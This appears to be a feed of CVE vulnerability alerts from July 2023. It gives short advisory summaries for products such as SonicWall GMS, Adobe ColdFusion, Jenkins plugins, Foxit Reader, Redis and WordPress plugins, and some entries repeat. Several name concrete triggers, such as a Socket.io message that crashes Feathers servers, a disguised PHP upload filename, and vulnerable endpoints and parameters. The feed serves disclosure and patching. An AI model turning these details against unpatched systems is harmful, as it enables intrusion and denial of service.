🚨 CVE-2023-34127Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in SonicWall GMS, SonicWall Analytics enables an authenticated attacker to execute arbitrary code with root privileges. This issue affects GMS: 9.3.2-SP1 and earlier versions; Analytics: 2.5.0.4-R7 and earlier versions.🎖@cveNotify |
|
| 2023-07-20 16:58:16 |
🚨 CVE-2023-29300Adobe ColdFusion versions 2018u16 (and earlier), 2021u6 (and earlier) and 2023.0.0.330468 (and earlier) are affected by a Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.🎖@cveNotify |
|
| 2023-07-20 16:58:15 |
🚨 CVE-2023-29301Adobe ColdFusion versions 2018u16 (and earlier), 2021u6 (and earlier) and 2023.0.0.330468 (and earlier) are affected by an Improper Restriction of Excessive Authentication Attempts vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to impact the confidentiality of the user. Exploitation of this issue does not require user interaction.🎖@cveNotify |
|
| 2023-07-20 16:58:13 |
🚨 CVE-2023-37949A missing permission check in Jenkins Orka by MacStadium Plugin 1.33 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.🎖@cveNotify |
|
| 2023-07-20 14:58:41 |
🚨 CVE-2023-37963A missing permission check in Jenkins Benchmark Evaluator Plugin 1.0.1 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified URL and to check for the existence of directories, `.csv`, and `.ycsb` files on the Jenkins controller file system.🎖@cveNotify |
|
| 2023-07-20 14:58:40 |
🚨 CVE-2023-37960Jenkins MathWorks Polyspace Plugin 1.0.5 and earlier allows attackers with Item/Configure permission to send emails with arbitrary files from the Jenkins controller file systems.🎖@cveNotify |
|
| 2023-07-20 14:58:39 |
🚨 CVE-2020-24188Cross-site scripting (XSS) vulnerability in the search functionality in Intrexx before 9.4.0 allows remote attackers to inject arbitrary web script or HTML via the request parameter.🎖@cveNotify |
|
| 2023-07-20 14:58:38 |
🚨 CVE-2023-33880In music service, there is a missing permission check. This could lead to local information disclosure with no additional execution privileges needed.🎖@cveNotify |
|
| 2023-07-20 14:58:37 |
🚨 CVE-2023-33879In music service, there is a missing permission check. This could lead to local information disclosure with no additional execution privileges needed.🎖@cveNotify |
|
| 2023-07-20 14:58:35 |
🚨 CVE-2023-32446Dell Wyse ThinOS versions prior to 2303 (9.4.1141) contain a sensitive information disclosure vulnerability. An unauthenticated malicious user with local access to the device could exploit this vulnerability to read sensitive information written to the log files.🎖@cveNotify |
|
| 2023-07-20 14:58:34 |
🚨 CVE-2023-32447Dell Wyse ThinOS versions prior to 2306 (9.4.2103) contain a sensitive information disclosure vulnerability. A malicious user with local access to the device could exploit this vulnerability to read sensitive information written to the log files.🎖@cveNotify |
|
| 2023-07-20 14:58:33 |
🚨 CVE-2023-32455Dell Wyse ThinOS versions prior to 2208 (9.3.2102) contain a sensitive information disclosure vulnerability. An unauthenticated malicious user with local access to the device could exploit this vulnerability to read sensitive information written to the log files.🎖@cveNotify |
|
| 2023-07-20 14:58:32 |
🚨 CVE-2023-3786A vulnerability classified as problematic has been found in Aures Komet up to 20230509. This affects an unknown part of the component Kiosk Mode. The manipulation leads to improper access controls. It is possible to launch the attack on the physical device. The exploit has been disclosed to the public and may be used. The identifier VDB-235053 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-07-20 14:58:31 |
🚨 CVE-2023-3354A flaw was found in the QEMU built-in VNC server. When a client connects to the VNC server, QEMU checks whether the current number of connections crosses a certain threshold and if so, cleans up the previous connection. If the previous connection happens to be in the handshake phase and fails, QEMU cleans up the connection again, resulting in a NULL pointer dereference issue. This could allow a remote unauthenticated client to cause a denial of service.🎖@cveNotify |
|
| 2023-07-20 14:58:30 |
🚨 CVE-2023-36824Redis is an in-memory database that persists on disk. In Redit 7.0 prior to 7.0.12, extracting key names from a command and a list of arguments may, in some cases, trigger a heap overflow and result in reading random heap memory, heap corruption and potentially remote code execution. Several scenarios that may lead to authenticated users executing a specially crafted `COMMAND GETKEYS` or `COMMAND GETKEYSANDFLAGS`and authenticated users who were set with ACL rules that match key names, executing a specially crafted command that refers to a variadic list of key names. The vulnerability is patched in Redis 7.0.12.🎖@cveNotify |
|
| 2023-07-20 14:58:29 |
🚨 CVE-2023-24329An issue in the urllib.parse component of Python before 3.11.4 allows attackers to bypass blocklisting methods by supplying a URL that starts with blank characters.🎖@cveNotify |
|
| 2023-07-20 14:58:28 |
🚨 CVE-2021-45450In Mbed TLS before 2.28.0 and 3.x before 3.1.0, psa_cipher_generate_iv and psa_cipher_encrypt allow policy bypass or oracle-based decryption when the output buffer is at memory locations accessible to an untrusted application.🎖@cveNotify |
|
| 2023-07-20 14:58:27 |
🚨 CVE-2023-28304Microsoft ODBC and OLE DB Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-07-20 14:58:26 |
🚨 CVE-2023-32481Wyse Management Suite versions prior to 4.0 contain a denial-of-service vulnerability. An authenticated malicious user can flood the configured SMTP server with numerous requests in order to deny access to the system.🎖@cveNotify |
|
| 2023-07-20 14:58:22 |
🚨 CVE-2023-32483Wyse Management Suite versions prior to 4.0 contain a sensitive information disclosure vulnerability. An authenticated malicious user having local access to the system running the application could exploit this vulnerability to read sensitive information written to log files.🎖@cveNotify |
|
| 2023-07-20 14:58:21 |
🚨 CVE-2023-32482Wyse Management Suite versions prior to 4.0 contain an improper authorization vulnerability. An authenticated malicious user with privileged access can push policies to unauthorized tenant group.🎖@cveNotify |
|
| 2023-07-20 14:58:20 |
🚨 CVE-2023-38408The PKCS#11 feature in ssh-agent in OpenSSH before 9.3p2 has an insufficiently trustworthy search path, leading to remote code execution if an agent is forwarded to an attacker-controlled system. (Code in /usr/lib is not necessarily safe for loading into ssh-agent.) NOTE: this issue exists because of an incomplete fix for CVE-2016-10009.🎖@cveNotify |
|
| 2023-07-20 14:58:19 |
🚨 CVE-2010-3856ld.so in the GNU C Library (aka glibc or libc6) before 2.11.3, and 2.12.x before 2.12.2, does not properly restrict use of the LD_AUDIT environment variable to reference dynamic shared objects (DSOs) as audit objects, which allows local users to gain privileges by leveraging an unsafe DSO located in a trusted library directory, as demonstrated by libpcprofile.so.🎖@cveNotify |
|
| 2023-07-20 14:58:18 |
🚨 CVE-2016-10009Untrusted search path vulnerability in ssh-agent.c in ssh-agent in OpenSSH before 7.4 allows remote attackers to execute arbitrary local PKCS#11 modules by leveraging control over a forwarded agent-socket.🎖@cveNotify |
|
| 2023-07-20 13:58:18 |
🚨 CVE-2023-37290InfoDoc Document On-line Submission and Approval System lacks sufficient restrictions on the available tags within its HTML to PDF conversion function, and allowing an unauthenticated attackers to load remote or local resources through HTML tags such as iframe. This vulnerability allows unauthenticated remote attackers to perform Server-Side Request Forgery (SSRF) attacks, gaining unauthorized access to arbitrary system files and uncovering the internal network topology.🎖@cveNotify |
|
| 2023-07-20 13:58:17 |
🚨 CVE-2023-3785A vulnerability was found in PaulPrinting CMS 2018. It has been rated as problematic. Affected by this issue is some unknown functionality. The manipulation of the argument firstname/lastname/address/city/state leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-235052.🎖@cveNotify |
|
| 2023-07-20 13:58:16 |
🚨 CVE-2023-3779The Essential Addons For Elementor plugin for WordPress is vulnerable to unauthenticated API key disclosure in versions up to, and including, 5.8.1 due to the plugin adding the API key to the source code of any page running the MailChimp block. This makes it possible for unauthenticated attackers to obtain a site's MailChimp API key. We recommend resetting any MailChimp API keys if running a vulnerable version of this plugin with the MailChimp block enabled as the API key may have been compromised. This only affects sites running the premium version of the plugin and that have the Mailchimp block enabled on a page.🎖@cveNotify |
|
| 2023-07-20 13:58:14 |
🚨 CVE-2021-39822Adobe InDesign versions 16.3 (and earlier), and 16.3.1 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious BMP file.🎖@cveNotify |
|
| 2023-07-20 13:58:13 |
🚨 CVE-2023-3783A vulnerability was found in Webile 1.0.1. It has been classified as problematic. Affected is an unknown function of the component HTTP POST Request Handler. The manipulation of the argument new_file_name/c leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-235050 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-07-20 11:58:17 |
🚨 CVE-2023-3784A vulnerability was found in Dooblou WiFi File Explorer 1.13.3. It has been declared as problematic. Affected by this vulnerability is an unknown functionality. The manipulation of the argument search/order/download/mode leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-235051.🎖@cveNotify |
|
| 2023-07-20 11:58:16 |
🚨 CVE-2023-3783A vulnerability was found in Webile 1.0.1. It has been classified as problematic. Affected is an unknown function of the component HTTP POST Request Handler. The manipulation of the argument new_file_name/c leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-235050 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-07-20 11:58:15 |
🚨 CVE-2021-39822Adobe InDesign versions 16.3 (and earlier), and 16.3.1 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious BMP file.🎖@cveNotify |
|
| 2023-07-20 11:58:14 |
🚨 CVE-2023-33204sysstat through 12.7.2 allows a multiplication integer overflow in check_overflow in common.c. NOTE: this issue exists because of an incomplete fix for CVE-2022-39377.🎖@cveNotify |
|
| 2023-07-20 11:58:13 |
🚨 CVE-2023-3779The Essential Addons For Elementor plugin for WordPress is vulnerable to unauthenticated API key disclosure in versions up to, and including, 5.8.1 due to the plugin adding the API key to the source code of any page running the MailChimp block. This makes it possible for unauthenticated attackers to obtain a site's MailChimp API key. We recommend resetting any MailChimp API keys if running a vulnerable version of this plugin with the MailChimp block enabled as the API key may have been compromised. This only affects sites running the premium version of the plugin and that have the Mailchimp block enabled on a page.🎖@cveNotify |
|
| 2023-07-20 05:58:44 |
🚨 CVE-2021-44696Adobe Prelude version 22.1.1 (and earlier) is affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious JPEG file.🎖@cveNotify |
|
| 2023-07-20 05:58:43 |
🚨 CVE-2023-33668DigiExam up to v14.0.2 lacks integrity checks for native modules, allowing attackers to access PII and takeover accounts on shared computers.🎖@cveNotify |
|
| 2023-07-20 05:58:42 |
🚨 CVE-2023-37582The RocketMQ NameServer component still has a remote command execution vulnerability as the CVE-2023-33246 issue was not completely fixed in version 5.1.1. When NameServer address are leaked on the extranet and lack permission verification, an attacker can exploit this vulnerability by using the update configuration function on the NameServer component to execute commands as the system users that RocketMQ is running as. It is recommended for users to upgrade their NameServer version to 5.1.2 or above for RocketMQ 5.x or 4.9.7 or above for RocketMQ 4.x to prevent these attacks.🎖@cveNotify |
|
| 2023-07-20 05:58:41 |
🚨 CVE-2023-29156DroneScout ds230 Remote ID receiver from BlueMark Innovations is affected by an information loss vulnerability through traffic injection.An attacker can exploit this vulnerability by injecting, at the right times, spoofed Open Drone ID (ODID) messages which force the DroneScout ds230 Remote ID receiver to drop real Remote ID (RID) information and, instead, generate and transmit JSON encoded MQTT messages containing crafted RID information. Consequently, the MQTT broker, typically operated by a system integrator, will have no access to the drones’ real RID information.This issue affects DroneScout ds230 in default configuration from firmware version 20211210-1627 through 20230329-1042.🎖@cveNotify |
|
| 2023-07-20 05:58:40 |
🚨 CVE-2023-37957A cross-site request forgery (CSRF) vulnerability in Jenkins Pipeline restFul API Plugin 0.11 and earlier allows attackers to connect to an attacker-specified URL, capturing a newly generated JCLI token.🎖@cveNotify |
|
| 2023-07-20 05:58:39 |
🚨 CVE-2023-37956A missing permission check in Jenkins Test Results Aggregator Plugin 1.2.13 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified credentials.🎖@cveNotify |
|
| 2023-07-20 05:58:37 |
🚨 CVE-2023-37628Online Piggery Management System 1.0 is vulnerable to SQL Injection.🎖@cveNotify |
|
| 2023-07-20 05:58:36 |
🚨 CVE-2023-37629Online Piggery Management System 1.0 is vulnerable to File Upload. An unauthenticated user can upload a php file by sending a POST request to "add-pig.php."🎖@cveNotify |
|
| 2023-07-20 05:58:35 |
🚨 CVE-2023-3644A vulnerability was found in SourceCodester Service Provider Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /classes/Master.php?f=save_inquiry. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. VDB-233890 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-07-20 05:58:34 |
🚨 CVE-2023-1672A race condition exists in the Tang server functionality for key generation and key rotation. This flaw results in a small time window where Tang private keys become readable by other processes on the same host.🎖@cveNotify |
|
| 2023-07-20 05:58:30 |
🚨 CVE-2023-31190DroneScout ds230 Remote ID receiver from BlueMark Innovations is affected by an Improper Authentication vulnerability during the firmware update procedure.Specifically, the firmware update procedure ignores and does not check the validity of the TLS certificate of the HTTPS endpoint from which the firmware update package (.tar.bz2 file) is downloaded.An attacker with the ability to put himself in a Man-in-the-Middle situation (e.g., DNS poisoning, ARP poisoning, control of a node on the route to the endpoint, etc.) can trick the DroneScout ds230 to install a crafted malicious firmware update containing arbitrary files (e.g., executable and configuration) and gain administrative (root) privileges on the underlying Linux operating system.This issue affects DroneScout ds230 firmware from version 20211210-1627 through 20230329-1042.🎖@cveNotify |
|
| 2023-07-20 05:58:29 |
🚨 CVE-2023-31191DroneScout ds230 Remote ID receiver from BlueMark Innovations is affected by an information loss vulnerability through traffic injection.An attacker can exploit this vulnerability by injecting, on carefully selected channels, high power spoofed Open Drone ID (ODID) messages which force the DroneScout ds230 Remote ID receiver to drop real Remote ID (RID) information and, instead, generate and transmit JSON encoded MQTT messages containing crafted RID information. Consequently, the MQTT broker, typically operated by a system integrator, will have no access to the drones’ real RID information.This issue affects the adjacent channel suppression algorithm present in DroneScout ds230 firmware from version 20211210-1627 through 20230329-1042.🎖@cveNotify |
|
| 2023-07-20 05:58:28 |
🚨 CVE-2023-3642A vulnerability was found in GZ Scripts Vacation Rental Website 1.8 and classified as problematic. Affected by this issue is some unknown functionality of the file /VacationRentalWebsite/property/8/ad-has-principes/ of the component HTTP POST Request Handler. The manipulation of the argument username/title/comment leads to cross site scripting. The attack may be launched remotely. The identifier of this vulnerability is VDB-233888.🎖@cveNotify |
|
| 2023-07-20 05:58:27 |
🚨 CVE-2023-3641A vulnerability has been found in khodakhah NodCMS 3.4.1 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /en/blog-comment-4 of the component POST Request Handler. The manipulation of the argument comment_name/comment_content leads to cross site scripting. The attack can be launched remotely. The associated identifier of this vulnerability is VDB-233887.🎖@cveNotify |
|
| 2023-07-20 05:58:26 |
🚨 CVE-2023-37630Online Piggery Management System 1.0 is vulnerable to Cross Site Scripting (XSS). An unauthenticated user can POST JavaScript code to "manage-breed.php" resulting in Persistent XSS.🎖@cveNotify |
|
| 2023-07-20 05:58:22 |
🚨 CVE-2023-2763Use-After-Free, Out-of-bounds Write and Heap-based Buffer Overflow vulnerabilities exist in the DWG and DXF file reading procedure in SOLIDWORKS Desktop from Release SOLIDWORKS 2021 through Release SOLIDWORKS 2023. These vulnerabilities could allow an attacker to execute arbitrary code while opening a specially crafted DWG or DXF file.🎖@cveNotify |
|
| 2023-07-20 05:58:21 |
🚨 CVE-2023-30928In telephony service, there is a possible missing permission check. This could lead to local escalation of privilege with no additional execution privileges.🎖@cveNotify |
|
| 2023-07-20 05:58:20 |
🚨 CVE-2023-30939In telephony service, there is a missing permission check. This could lead to local information disclosure with no additional execution privileges needed.🎖@cveNotify |
|
| 2023-07-20 05:58:19 |
🚨 CVE-2023-3269A vulnerability exists in the memory management subsystem of the Linux kernel. The lock handling for accessing and updating virtual memory areas (VMAs) is incorrect, leading to use-after-free problems. This issue can be successfully exploited to execute arbitrary kernel code, escalate containers, and gain root privileges.🎖@cveNotify |
|
| 2023-07-20 01:58:20 |
🚨 CVE-2023-32657Weintek Weincloud v0.13.6 could allow an attacker to efficiently develop a brute force attack on credentials with authentication hints from error message responses.🎖@cveNotify |
|
| 2023-07-20 01:58:19 |
🚨 CVE-2023-34394In Keysight Geolocation Server v2.4.2 and prior, an attacker could upload a specially crafted malicious file or delete any file or directory with SYSTEM privileges due to an improper path validation, which could result in local privilege escalation or a denial-of-service condition.🎖@cveNotify |
|
| 2023-07-20 01:58:15 |
🚨 CVE-2023-35134Weintek Weincloud v0.13.6 could allow an attacker to reset a password with the corresponding account’s JWT token only.🎖@cveNotify |
|
| 2023-07-20 01:58:14 |
🚨 CVE-2023-36853?In Keysight Geolocation Server v2.4.2 and prior, a low privileged attacker could create a local ZIP file containing a malicious script in any location. The attacker could abuse this to load a DLL with SYSTEM privileges.🎖@cveNotify |
|
| 2023-07-20 01:58:13 |
🚨 CVE-2023-37362Weintek Weincloud v0.13.6 could allow an attacker to abuse the registration functionality to login with testing credentials to the official website.🎖@cveNotify |
|
| 2023-07-20 01:58:12 |
🚨 CVE-2023-34330AMI SPx contains a vulnerability in the BMC where a user may inject code which could be executed via a Dynamic Redfish Extension interface. A successful exploit of this vulnerability may lead to a loss of confidentiality, integrity, and availability. 🎖@cveNotify |
|
| 2023-07-19 22:58:29 |
🚨 CVE-2023-26217The Data Exchange Add-on component of TIBCO Software Inc.'s TIBCO EBX Add-ons contains an easily exploitable vulnerability that allows a low privileged user with import permissions and network access to the EBX server to execute arbitrary SQL statements on the affected system. Affected releases are TIBCO Software Inc.'s TIBCO EBX Add-ons: versions 4.5.17 and below, versions 5.6.2 and below, version 6.1.0.🎖@cveNotify |
|
| 2023-07-19 22:58:25 |
🚨 CVE-2023-34329AMI MegaRAC SPx12 contains a vulnerability in BMC where a User may cause an authentication bypass by spoofing the HTTP header. A successful exploit of this vulnerability may lead to loss of confidentiality, integrity, and availability.🎖@cveNotify |
|
| 2023-07-19 22:58:24 |
🚨 CVE-2023-3519Unauthenticated remote code execution🎖@cveNotify |
|
| 2023-07-19 22:58:23 |
🚨 CVE-2023-37276aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. aiohttp v3.8.4 and earlier are bundled with llhttp v6.0.6. Vulnerable code is used by aiohttp for its HTTP request parser when available which is the default case when installing from a wheel. This vulnerability only affects users of aiohttp as an HTTP server (ie `aiohttp.Application`), you are not affected by this vulnerability if you are using aiohttp as an HTTP client library (ie `aiohttp.ClientSession`). Sending a crafted HTTP request will cause the server to misinterpret one of the HTTP header values leading to HTTP request smuggling. This issue has been addressed in version 3.8.5. Users are advised to upgrade. Users unable to upgrade can reinstall aiohttp using `AIOHTTP_NO_EXTENSIONS=1` as an environment variable to disable the llhttp HTTP request parser implementation. The pure Python implementation isn't vulnerable.🎖@cveNotify |
|
| 2023-07-19 22:58:20 |
🚨 CVE-2023-37899Feathersjs is a framework for creating web APIs and real-time applications with TypeScript or JavaScript. Feathers socket handler did not catch invalid string conversion errors like `const message = ${{ toString: '' }}` which would cause the NodeJS process to crash when sending an unexpected Socket.io message like `socket.emit('find', { toString: '' })`. A fix has been released in versions 5.0.8 and 4.5.18. Users are advised to upgrade. There is no known workaround for this vulnerability.🎖@cveNotify |
|
| 2023-07-19 22:58:19 |
🚨 CVE-2023-32693Decidim is a participatory democracy framework, written in Ruby on Rails, originally developed for the Barcelona City government online and offline participation website. The external link feature is susceptible to cross-site scripting. This allows a remote attacker to execute JavaScript code in the context of a currently logged-in user. An attacker could use this vulnerability to make other users endorse or support proposals they have no intention of supporting or endorsing. The problem was patched in versions 0.27.3 and 0.26.7.🎖@cveNotify |
|
| 2023-07-19 22:58:18 |
🚨 CVE-2016-10009Untrusted search path vulnerability in ssh-agent.c in ssh-agent in OpenSSH before 7.4 allows remote attackers to execute arbitrary local PKCS#11 modules by leveraging control over a forwarded agent-socket.🎖@cveNotify |
|
| 2023-07-19 20:58:15 |
🚨 CVE-2020-36757The WP Hotel Booking plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.10.1. This is due to missing or incorrect nonce validation on the admin_add_order_item() function. This makes it possible for unauthenticated attackers to add an order item via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-07-19 20:58:14 |
🚨 CVE-2023-32664A type confusion vulnerability exists in the Javascript checkThisBox method as implemented in Foxit Reader 12.1.2.15332. A specially-crafted Javascript code inside a malicious PDF document can cause memory corruption and lead to remote code execution. User would need to open a malicious file to trigger the vulnerability.🎖@cveNotify |
|
| 2023-07-19 20:58:13 |
🚨 CVE-2023-33866A use-after-free vulnerability exists in the JavaScript engine of Foxit Software’s PDF Reader, version 12.1.2.15332. By prematurely deleting objects associated with pages, a specially crafted PDF document can trigger the reuse of previously freed memory, which can lead to arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability. Exploitation is also possible if a user visits a specially crafted, malicious site if the browser plugin extension is enabled.🎖@cveNotify |
|
| 2023-07-19 18:58:36 |
🚨 CVE-2023-33170ASP.NET and Visual Studio Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2023-07-19 18:58:35 |
🚨 CVE-2021-43760Adobe Media Encoder versions 22.0, 15.4.2 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious MOV file.🎖@cveNotify |
|
| 2023-07-19 18:58:34 |
🚨 CVE-2021-43757Adobe Media Encoder versions 22.0, 15.4.2 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious 3GP ?file🎖@cveNotify |
|
| 2023-07-19 18:58:33 |
🚨 CVE-2021-43758Adobe Media Encoder versions 22.0, 15.4.2 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious MP4 file.🎖@cveNotify |
|
| 2023-07-19 18:58:32 |
🚨 CVE-2021-43759Adobe Media Encoder versions 22.0, 15.4.2 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious MP4 file.🎖@cveNotify |
|
| 2023-07-19 18:58:31 |
🚨 CVE-2022-48451In bluetooth service, there is a possible out of bounds write due to race condition. This could lead to local denial of service with System execution privileges needed.🎖@cveNotify |
|
| 2023-07-19 18:58:30 |
🚨 CVE-2022-48450In bluetooth service, there is a possible missing params check. This could lead to local denial of service with System execution privileges needed.🎖@cveNotify |
|
| 2023-07-19 18:58:29 |
🚨 CVE-2023-3202The MStore API plugin for WordPress is vulnerable to Cross-Site Request Forgery due to missing nonce validation on the mstore_update_firebase_server_key function. This makes it possible for unauthenticated attackers to update the firebase server key to push notification when order status changed via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-07-19 18:58:28 |
🚨 CVE-2023-3209The MStore API WordPress plugin before 3.9.7 does not secure most of its AJAX actions by implementing privilege checks, nonce checks, or a combination of both.🎖@cveNotify |
|
| 2023-07-19 18:58:27 |
🚨 CVE-2023-3271Improper Access Control in the SICK ICR890-4 could allow an unauthenticated remote attacker to gather information about the system and download data via the REST API by accessingunauthenticated endpoints.🎖@cveNotify |
|
| 2023-07-19 18:58:25 |
🚨 CVE-2023-37748ngiflib commit 5e7292 was discovered to contain an infinite loop via the function DecodeGifImg at ngiflib.c.🎖@cveNotify |
|
| 2023-07-19 18:58:24 |
🚨 CVE-2023-33876A use-after-free vulnerability exists in the way Foxit Reader 12.1.2.15332 handles destroying annotations. A specially-crafted Javascript code inside a malicious PDF document can trigger reuse of a previously freed object which can lead to memory corruption and result in arbitrary code execution. A specially-crafted Javascript code inside a malicious PDF document can cause memory corruption and lead to remote code execution. Exploitation is also possible if a user visits a specially-crafted, malicious site if the browser plugin extension is enabled.🎖@cveNotify |
|
| 2023-07-19 18:58:23 |
🚨 CVE-2023-22506This High severity Injection and RCE (Remote Code Execution) vulnerability known as CVE-2023-22506 was introduced in version 8.0.0 of Bamboo Data Center. This Injection and RCE (Remote Code Execution) vulnerability, with a CVSS Score of 7.5, allows an authenticated attacker tomodify the actions taken by a system call and execute arbitrary code which has high impact to confidentiality, high impact to integrity, high impact to availability, and no user interaction. Atlassian recommends that you upgrade your instance to latest version. If you're unable to upgrade to latest, upgrade to one of these fixed versions: 9.2.3 and 9.3.1. See the release notes ([https://confluence.atlassian.com/bambooreleases/bamboo-release-notes-1189793869.html|https://confluence.atlassian.com/bambooreleases/bamboo-release-notes-1189793869.html]). You can download the latest version of Bamboo Data Center and Bamboo Server from the download center ([https://www.atlassian.com/software/bamboo/download-archives|https://www.atlassian.com/software/bamboo/download-archives]). This vulnerability was reported via our Penetration Testing program.🎖@cveNotify |
|
| 2023-07-19 18:58:22 |
🚨 CVE-2023-3131The MStore API WordPress plugin before 3.9.7 does not secure most of its AJAX actions by implementing privilege checks, nonce checks, or a combination of both.🎖@cveNotify |
|
| 2023-07-19 18:58:21 |
🚨 CVE-2023-33253LabCollector 6.0 though 6.15 allows remote code execution. An authenticated remote low-privileged user can upload an executable PHP file and execute system commands. The vulnerability is in the message function, and is due to insufficient validation of the file (such as shell.jpg.php.shell) being sent.🎖@cveNotify |
|
| 2023-07-19 18:58:20 |
🚨 CVE-2023-3023The WP EasyCart plugin for WordPress is vulnerable to time-based SQL Injection via the ‘orderby’ parameter in versions up to, and including, 5.4.10 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with administrator-level or above permissions, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.🎖@cveNotify |
|
| 2023-07-19 18:58:19 |
🚨 CVE-2023-35874SAP NetWeaver Application Server ABAP and ABAP Platform - version KRNL64NUC, 7.22, KRNL64NUC 7.22EXT, KRNL64UC 7.22, KRNL64UC 7.22EXT, KRNL64UC 7.53, KERNEL 7.22, KERNEL, 7.53, KERNEL 7.77, KERNEL 7.81, KERNEL 7.85, KERNEL 7.89, KERNEL 7.54, KERNEL 7.92, KERNEL 7.93, under some conditions, performs improper authentication checks for functionalities that require user identity. An attacker can perform malicious actions over the network, extending the scope of impact, causing a limited impact on confidentiality, integrity and availability.🎖@cveNotify |
|
| 2023-07-19 18:58:17 |
🚨 CVE-2023-30926In opm service, there is a missing permission check. This could lead to local information disclosure with no additional execution privileges needed.🎖@cveNotify |
|
| 2023-07-19 18:58:16 |
🚨 CVE-2023-30924In messaging service, there is a missing permission check. This could lead to local information disclosure with no additional execution privileges needed.🎖@cveNotify |
|
| 2023-07-19 18:58:15 |
🚨 CVE-2023-30922In messaging service, there is a missing permission check. This could lead to local information disclosure with no additional execution privileges needed.🎖@cveNotify |
|
| 2023-07-19 16:58:19 |
🚨 CVE-2023-33866A use-after-free vulnerability exists in the JavaScript engine of Foxit Software’s PDF Reader, version 12.1.2.15332. By prematurely deleting objects associated with pages, a specially crafted PDF document can trigger the reuse of previously freed memory, which can lead to arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability. Exploitation is also possible if a user visits a specially crafted, malicious site if the browser plugin extension is enabled.🎖@cveNotify |
|
| 2023-07-19 16:58:15 |
🚨 CVE-2022-40896A ReDoS issue was discovered in pygments/lexers/smithy.py in pygments through 2.15.0 via SmithyLexer.🎖@cveNotify |
|
| 2023-07-19 16:58:14 |
🚨 CVE-2023-34034Using "**" as a pattern in Spring Security configuration for WebFlux creates a mismatch in pattern matching between Spring Security and Spring WebFlux, and the potential for a security bypass.🎖@cveNotify |
|
| 2023-07-19 16:58:13 |
🚨 CVE-2023-27379A use-after-free vulnerability exists in the JavaScript engine of Foxit Software’s PDF Reader, version 12.1.2.15332. By prematurely deleting objects associated with pages, a specially crafted PDF document can trigger the reuse of previously freed memory, which can lead to arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability. Exploitation is also possible if a user visits a specially crafted, malicious site if the browser plugin extension is enabled.🎖@cveNotify |
|
| 2023-07-19 15:58:32 |
🚨 CVE-2023-33989An attacker with non-administrative authorizations in SAP NetWeaver (BI CONT ADD ON) - versions 707, 737, 747, 757, can exploit a directory traversal flaw to over-write system files. Data from confidential files cannot be read but potentially some OS files can be over-written leading to system compromise.🎖@cveNotify |
|
| 2023-07-19 15:58:31 |
🚨 CVE-2023-3759A vulnerability, which was classified as critical, was found in Intergard SGS 8.7.0. Affected is an unknown function. The manipulation leads to permission issues. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-234444. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-19 15:58:30 |
🚨 CVE-2023-32635XBRL data create application version 7.0 and earlier improperly restricts XML external entity references (XXE). By processing a specially crafted XBRL file, arbitrary files on the system may be read by an attacker.🎖@cveNotify |
|
| 2023-07-19 15:58:29 |
🚨 CVE-2023-3761A vulnerability was found in Intergard SGS 8.7.0 and classified as problematic. Affected by this issue is some unknown functionality of the component Password Change Handler. The manipulation leads to cleartext transmission of sensitive information. The attack may be launched remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. VDB-234446 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-19 15:58:25 |
